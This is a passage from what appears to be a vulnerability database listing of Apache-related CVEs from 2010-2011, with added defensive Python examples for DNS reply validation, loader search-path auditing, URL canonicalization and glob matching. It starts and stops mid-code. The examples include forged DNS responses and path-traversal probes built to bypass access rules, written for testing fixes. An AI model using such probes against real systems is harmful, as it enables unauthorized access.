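ANSWER_RR = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([192, 0, 2, 1])


def run_constructed_exchange():
    """Returns (forged id accepted?, forged question accepted?,
    genuine reply accepted?, replayed genuine reply accepted?)."""
    r = Resolver()
    sport, query = r.build_query("example.com")
    txid = struct.unpack("!H", query[:2])[0]
    question = query[12:]
    good = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0) + question + ANSWER_RR
    wrong_id = struct.pack("!HHHHHH", (txid + 1) & 0xFFFF, 0x8180, 1, 1, 0, 0) + question + ANSWER_RR
    wrong_q = (struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
               + encode_qname("evil.example") + struct.pack("!HH", 1, 1) + ANSWER_RR)
    return (r.accept_response(sport, wrong_id),
            r.accept_response(sport, wrong_q),
            r.accept_response(sport, good),
            r.accept_response(sport, good))


if __name__ == "__main__":
    print(run_constructed_exchange())   # (False, False, True, False)
```

A real resolver additionally checks that the datagram came from the server's address and port it sent to; that part is omitted here because the example never touches a socket.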

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache traffic_server 2.1.1
apache traffic_server 2.1.0
apache traffic_server *
CVE-2010-2953 MEDIUM

Untrusted search path vulnerability in a certain Debian GNU/Linux patch for the couchdb script in CouchDB 0.8.0 allows local users to gain privileges via a crafted shared library in the current working directory.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache couchdb 0.8.0
CVE-2010-3083 MEDIUM

sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
redhat enterprise_mrg 1.0.2
redhat enterprise_mrg 1.1.2
apache qpid 0.5
apache qpid 0.6
redhat enterprise_mrg 1.0
redhat enterprise_mrg *
redhat enterprise_mrg 1.0.1
redhat enterprise_mrg 1.0.3
redhat enterprise_mrg 1.1.1
CVE-2010-3315 MEDIUM

authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache subversion 1.5.5
apache subversion 1.5.7
apache subversion 1.6.7
apache subversion 1.6.0
apache subversion 1.6.6
apache subversion 1.6.10
apache subversion 1.5.3
apache subversion 1.6.12
apache subversion 1.5.2
apache subversion 1.6.11
apache subversion 1.5.0
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.5.1
apache subversion 1.6.1
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.6.3
apache subversion 1.6.5
apache subversion 1.5.4
apache subversion 1.5.6
CVE-2010-3449 MEDIUM

Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1; and Apache Continuum 1.3.6, 1.4.0, and 1.1 through 1.2.3.1; allows remote attackers to hijack the authentication of administrators for requests that modify credentials.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache archiva 1.1.3
jesse_mcconnell redback 1.2.2
apache archiva 1.1.4
apache archiva 1.2
jesse_mcconnell redback *
apache archiva 1.2.2
apache archiva 1.3.1
jesse_mcconnell redback 1.1.2
jesse_mcconnell redback 1.0.2
apache archiva 1.2.1
jesse_mcconnell redback 1.0
jesse_mcconnell redback 1.0.1
jesse_mcconnell redback 1.1
jesse_mcconnell redback 1.0.3
jesse_mcconnell redback 1.2.1
apache archiva 1.3
jesse_mcconnell redback 1.2
jesse_mcconnell redback 1.1.1
apache archiva 1.1.1
apache archiva 1.0.1
apache archiva 1.0.3
apache archiva 1.1
apache archiva 1.1.2
apache archiva 1.0
apache archiva 1.0.2
CVE-2010-3450 HIGH

Multiple directory traversal vulnerabilities in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allow remote attackers to overwrite arbitrary files via a .. (dot dot) in an entry in (1) an XSLT JAR filter description file, (2) an Extension (aka OXT) file, or unspecified other (3) JAR or (4) ZIP files.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3451 HIGH

Use-after-free vulnerability in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via malformed tables in an RTF document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-416,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3452 HIGH

Use-after-free vulnerability in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted tags in an RTF document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-416,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3453 HIGH

The WW8ListManager::WW8ListManager function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 does not properly handle an unspecified number of list levels in user-defined list styles in WW8 data in a Microsoft Word document, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .DOC file that triggers an out-of-bounds write.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3454 HIGH

Multiple off-by-one errors in the WW8DopTypography::ReadFromMem function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted typography information in a Microsoft Word .DOC file that triggers an out-of-bounds write.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-193,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3689 MEDIUM

soffice in OpenOffice.org (OOo) 3.x before 3.3 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse shared library in the current working directory.
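
Both this entry and CVE-2010-2953 above are the same launcher-script mistake: a search path that ends up containing an empty element (for example from LD_LIBRARY_PATH="$APPLIB:$LD_LIBRARY_PATH" when the variable was unset), which the dynamic loader treats as the current working directory. The Python below is an added check, not code from OpenOffice.org or Debian: it audits a colon-separated path value for entries that resolve to the working directory or to a world-writable location, and shows how to build such a value without ever emitting an empty element. The directory names in the usage are constructed.

```python
import os


def unsafe_search_path_entries(value: str):
    """Audit a colon-separated loader search path (LD_LIBRARY_PATH, PATH) and
    return (entry, reason) pairs for entries that make the loader consult the
    current working directory or a directory other users can write to."""
    findings = []
    for entry in value.split(":"):
        if entry in ("", "."):
            findings.append((entry, "empty or '.' entry resolves to the current working directory"))
        elif not entry.startswith("/"):
            findings.append((entry, "relative entry resolves under the current working directory"))
        elif os.path.isdir(entry):
            mode = os.stat(entry).st_mode
            if mode & 0o002 and not mode & 0o1000:
                findings.append((entry, "world-writable directory without the sticky bit"))
    return findings


def build_library_path(*dirs: str) -> str:
    """Join directories into a search-path value, dropping empty elements so
    an unset inherited variable can never produce a trailing or doubled ':'."""
    return ":".join(d for d in dirs if d)


if __name__ == "__main__":
    # Shape of the vulnerable script: inherited variable empty, trailing colon results.
    inherited = ""
    broken = "/opt/example/lib:" + inherited
    print(broken, unsafe_search_path_entries(broken))
    print(build_library_path("/opt/example/lib", inherited))
```

Run the audit against the value a launcher script actually exports (for example by printing it from the script under test), not just against the environment of the shell you are sitting in.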

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-3718 LOW

Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2010-3854 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache couchdb 0.8.1
apache couchdb 0.9.1
apache couchdb 0.10.0
apache couchdb 0.9.2
apache couchdb 0.11.0
apache couchdb 1.0.0
apache couchdb 0.11.2
apache couchdb 0.9.0
apache couchdb 1.0.1
apache couchdb 0.10.1
apache couchdb 0.8.0
apache couchdb 0.11.1
apache couchdb 0.10.2
CVE-2010-3863 MEDIUM

Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
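
The /./account/index.jsp example in the description works because the rule check compared the raw request path while the container served the normalized one. The Python below is an added illustration, not Shiro code: a canonicalize() step (percent-decoding, then collapsing ".", ".." and doubled slashes) applied before the rule comparison, with a flag that reproduces the vulnerable raw comparison for contrast. The rule chain is a constructed, prefix-based stand-in for a shiro.ini [urls] section; real Shiro rules are Ant-style patterns.

```python
import posixpath
from urllib.parse import unquote


def canonicalize(path: str) -> str:
    """Bring a request path into the single form the access rules are written
    against.  It must yield the same path the container will dispatch;
    otherwise the rule check and the dispatch disagree and a bypass follows."""
    path = unquote(path)
    if not path.startswith("/"):
        path = "/" + path
    norm = posixpath.normpath(path)     # collapses '.', '..' and '//' inside the path
    if norm.startswith("//"):           # POSIX keeps a leading '//'; a URL path should not
        norm = "/" + norm.lstrip("/")
    return norm


# Constructed filter chain: first match wins, like the [urls] section of shiro.ini,
# reduced to plain prefix rules for the example.
RULES = [("/account/", "authc"), ("/", "anon")]


def filter_for(path: str, rules=RULES, canonical=True) -> str:
    """Return the filter a request path is routed to.  canonical=False models
    the vulnerable behaviour of comparing the raw request path to the rules."""
    p = canonicalize(path) if canonical else path
    for prefix, filt in rules:
        if p == prefix.rstrip("/") or p.startswith(prefix):
            return filt
    return "anon"


if __name__ == "__main__":
    for probe in ("/account/index.jsp", "/./account/index.jsp",
                  "/foo/../account/index.jsp", "//account/index.jsp",
                  "/%61ccount/index.jsp"):
        print(f"{probe:32} raw={filter_for(probe, canonical=False):6} "
              f"canonical={filter_for(probe)}")
```

The same disagreement shows up whenever an authorization layer and the component that finally resolves the path normalize differently; the check belongs on the canonical form, and that form should be computed once and shared.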

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
jsecurity jsecurity 0.9.0
apache shiro *
CVE-2010-3872 HIGH

A flaw was found in the mod_fcgid module of httpd. A malformed FastCGI response may result in a stack-based buffer overflow in the modules/fcgid/fcgid_bucket.c file in the fcgid_header_bucket_read() function, resulting in an application crash.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
secalert@redhat.com 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-121,CWE-189,

Products Affected

Vendor Product Version
apache mod_fcgid 2.3.4
apache mod_fcgid 2.3.2
apache mod_fcgid 2.3.1
apache mod_fcgid 2.3.3
apache mod_fcgid *
CVE-2010-4008 MEDIUM

libxml2 before 2.7.8, as used in Google Chrome before 7.0.517.44, Apple Safari 5.0.2 and earlier, and other products, reads from invalid memory locations during processing of malformed XPath expressions, which allows context-dependent attackers to cause a denial of service (application crash) via a crafted XML document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_eus 6.3
apple mac_os_x *
apple safari *
apache openoffice *
debian debian_linux 6.0
opensuse opensuse 11.3
canonical ubuntu_linux 10.04
apple iphone_os *
apple itunes *
canonical ubuntu_linux 10.10
redhat enterprise_linux_desktop 6.0
opensuse opensuse 11.2
xmlsoft libxml2 *
opensuse opensuse 11.1
canonical ubuntu_linux 8.04
debian debian_linux 5.0
canonical ubuntu_linux 6.06
redhat enterprise_linux_server 6.0
suse suse_linux_enterprise_server 10
suse suse_linux_enterprise_server 11
redhat enterprise_linux_workstation 6.0
google chrome *
canonical ubuntu_linux 9.10
CVE-2010-4172 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.1
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.13
apache tomcat 6.0.16
apache tomcat 7.0.2
apache tomcat 6.0.27
apache tomcat 6.0.19
apache tomcat 6.0.24
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 6.0.29
apache tomcat 7.0.0
apache tomcat 6.0.12
apache tomcat 6.0.14
apache tomcat 6.0.17
apache tomcat 6.0.20
CVE-2010-4253 HIGH

Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PNG file in an ODF or Microsoft Office document, as demonstrated by a PowerPoint (aka PPT) document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
canonical ubuntu_linux 9.10
CVE-2010-4312 MEDIUM

The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache tomcat 6.0.28
apache tomcat 6.0
apache tomcat 6.0.13
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.8
apache tomcat 6.0.18
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 6.0.15
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 6.0.5
apache tomcat 6.0.3
apache tomcat 6.0.14
apache tomcat 6.0.17
CVE-2010-4340 MEDIUM

libcloud before 0.4.1 does not verify SSL certificates for HTTPS connections, which allows remote attackers to spoof certificates and bypass intended access restrictions via a man-in-the-middle (MITM) attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache libcloud *
apache libcloud 0.3.0
apache libcloud 0.3.1
apache libcloud 0.2.0
CVE-2010-4408 MEDIUM

Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva 1.1.3
apache archiva 1.3
apache archiva 1.1.4
apache archiva 1.2
apache archiva 1.1.1
apache archiva 1.0.1
apache archiva 1.0.3
apache archiva 1.2.2
apache archiva 1.3.1
apache archiva 1.1
apache archiva 1.2.1
apache archiva 1.1.2
apache archiva 1.0
apache archiva 1.0.2
CVE-2010-4494 HIGH

Double free vulnerability in libxml2 2.7.8 and other versions, as used in Google Chrome before 8.0.552.215 and other products, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to XPath handling.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-415,

Products Affected

Vendor Product Version
hp insight_control_server_deployment *
apple mac_os_x *
apple safari *
apache openoffice *
debian debian_linux 6.0
opensuse opensuse 11.3
apple iphone_os *
apple itunes *
hp rapid_deployment_pack *
redhat enterprise_linux_desktop 6.0
opensuse opensuse 11.2
xmlsoft libxml2 *
fedoraproject fedora 14
debian debian_linux 5.0
redhat enterprise_linux_server 6.0
suse suse_linux_enterprise_server 11
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_eus 6.3
google chrome *
CVE-2010-4539 MEDIUM

The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache subversion 0.28.2
apache subversion 0.7
apache subversion 0.8
apache subversion 0.28.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 0.28.1
apache subversion 0.33.0
apache subversion 1.5.6
apache subversion 0.25.0
apache subversion 0.14.5
apache subversion 1.1.2
apache subversion 0.16
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 0.35.0
apache subversion 1.0.8
apache subversion 1.6.12
apache subversion 0.17.0
apache subversion 1.6.13
apache subversion 0.32.1
apache subversion 1.0.0
apache subversion 1.6.3
apache subversion 0.18.0
apache subversion 1.5.8
apache subversion 1.2.3
apache subversion 0.13.1
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 0.22.0
apache subversion 1.6.0
apache subversion 0.23.0
apache subversion m3
apache subversion 1.5.2
apache subversion 0.12.0
apache subversion 0.14.0
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 0.14.3
apache subversion 0.27.0
apache subversion 1.4.6
apache subversion 0.14.4
apache subversion 0.10.0
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.3.0
apache subversion 1.6.10
apache subversion 0.35.1
apache subversion 0.24.1
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 0.31.0
apache subversion 0.30.0
apache subversion 0.36.0
apache subversion 1.4.0
apache subversion 0.10.2
apache subversion 0.22.1
apache subversion 0.9
apache subversion 1.3.2
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion m1
apache subversion 1.0.6
apache subversion 0.29.0
apache subversion 1.6.11
apache subversion 0.14.2
apache subversion 0.24.2
apache subversion 0.34.0
apache subversion 0.21.0
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 0.15
apache subversion 1.3.1
apache subversion 0.26.0
apache subversion 0.33.1
apache subversion *
apache subversion 0.10.1
apache subversion 0.13.2
apache subversion 0.13.0
apache subversion 1.1.4
apache subversion 0.17.1
apache subversion 0.19.1
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 0.20.0
apache subversion 0.20.1
apache subversion 0.24.0
apache subversion 1.5.7
apache subversion 0.37.0
apache subversion 0.11.1
apache subversion m2
apache subversion 0.22.2
apache subversion 0.18.1
apache subversion 1.6.4
apache subversion 1.6.9
apache subversion 1.0.9
apache subversion 1.5.4
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 0.19.0
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 0.16.1
apache subversion 0.14.1
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion m4/m5
apache subversion 0.6
apache subversion 1.4.1
CVE-2010-4643 HIGH

Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted Truevision TGA (TARGA) file in an ODF or Microsoft Office document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2010-4644 LOW

Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.

CVSS 2.0

Severity: LOW

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache subversion 0.28.2
apache subversion 0.7
apache subversion 0.8
apache subversion 0.28.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 0.28.1
apache subversion 0.33.0
apache subversion 1.5.6
apache subversion 0.25.0
apache subversion 0.14.5
apache subversion 1.1.2
apache subversion 0.16
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 0.35.0
apache subversion 1.0.8
apache subversion 1.6.12
apache subversion 0.17.0
apache subversion 1.6.13
apache subversion 0.32.1
apache subversion 1.0.0
apache subversion 1.6.3
apache subversion 0.18.0
apache subversion 1.5.8
apache subversion 1.2.3
apache subversion 0.13.1
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 0.22.0
apache subversion 1.6.0
apache subversion 0.23.0
apache subversion m3
apache subversion 1.5.2
apache subversion 0.12.0
apache subversion 0.14.0
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 0.14.3
apache subversion 0.27.0
apache subversion 1.4.6
apache subversion 0.14.4
apache subversion 0.10.0
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.3.0
apache subversion 1.6.10
apache subversion 0.35.1
apache subversion 0.24.1
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 0.31.0
apache subversion 0.30.0
apache subversion 0.36.0
apache subversion 1.4.0
apache subversion 0.10.2
apache subversion 0.22.1
apache subversion 0.9
apache subversion 1.3.2
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion m1
apache subversion 1.0.6
apache subversion 0.29.0
apache subversion 1.6.11
apache subversion 0.14.2
apache subversion 0.24.2
apache subversion 0.34.0
apache subversion 0.21.0
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 0.15
apache subversion 1.3.1
apache subversion 0.26.0
apache subversion 0.33.1
apache subversion *
apache subversion 0.10.1
apache subversion 0.13.2
apache subversion 0.13.0
apache subversion 1.1.4
apache subversion 0.17.1
apache subversion 0.19.1
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 0.20.0
apache subversion 0.20.1
apache subversion 0.24.0
apache subversion 1.5.7
apache subversion 0.37.0
apache subversion 0.11.1
apache subversion m2
apache subversion 0.22.2
apache subversion 0.18.1
apache subversion 1.6.4
apache subversion 1.6.9
apache subversion 1.0.9
apache subversion 1.5.4
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 0.19.0
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 0.16.1
apache subversion 0.14.1
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion m4/m5
apache subversion 0.6
apache subversion 1.4.1
CVE-2010-5312 MEDIUM

Cross-site scripting (XSS) vulnerability in jquery.ui.dialog.js in the Dialog widget in jQuery UI before 1.10.0 allows remote attackers to inject arbitrary web script or HTML via the title option.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
fedoraproject fedora 35
drupal drupal *
debian debian_linux 9.0
fedoraproject fedora 36
netapp snapcenter -
debian debian_linux 7.0
jquery jquery_ui *
apache drill 1.16.0
CVE-2011-0013 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-0419 MEDIUM

Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
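
The description is about how a glob matcher handles "*": the old implementation recursed once per candidate split point, so a pattern built from repeated *? units makes the amount of backtracking grow polynomially in the number of units and the stack grow with the input. The Python below is an added illustration, not APR or libc code: a textbook recursive matcher for "*" and "?" with a call counter, beside an iterative matcher that does the same job in bounded work and constant stack. Patterns and names are constructed for the example.

```python
def fnmatch_recursive(pattern: str, name: str, calls=None) -> bool:
    """Textbook backtracking matcher for '*' and '?' only.  On '*' it tries
    every split point and recurses on the rest of the pattern, the shape of
    a pre-fix recursive fnmatch (simplified: no classes, no escapes).
    'calls' is an optional one-element list used to count invocations."""
    if calls is not None:
        calls[0] += 1
    if not pattern:
        return not name
    c = pattern[0]
    if c == "*":
        return any(fnmatch_recursive(pattern[1:], name[i:], calls)
                   for i in range(len(name) + 1))
    if not name:
        return False
    if c == "?" or c == name[0]:
        return fnmatch_recursive(pattern[1:], name[1:], calls)
    return False


def recursive_call_count(pattern: str, name: str) -> int:
    """How many recursive invocations the naive matcher needs."""
    calls = [0]
    fnmatch_recursive(pattern, name, calls)
    return calls[0]


def fnmatch_iterative(pattern: str, name: str) -> bool:
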